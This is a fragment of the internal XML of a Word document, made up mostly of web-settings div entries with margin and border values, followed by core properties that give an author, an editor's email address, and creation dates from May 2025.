            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="94713751">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="640430399">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1320113263">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1875655835">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1518041406">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1783183631">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="310329165">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="189027678">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="584799086">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1051341433">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1523476628">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="292835910">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1922375019">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1586722452">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="731390385">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="436828995">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1429034958">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="504711539">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1335063881">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="212817384">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1083987613">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2049916697">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="586304284">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="27030586">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="315769226">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1561940492">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="695272182">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="282659153">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="207534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kaundal</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>srishtianand23dec@gmail.com</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-15T06:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-18T06:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>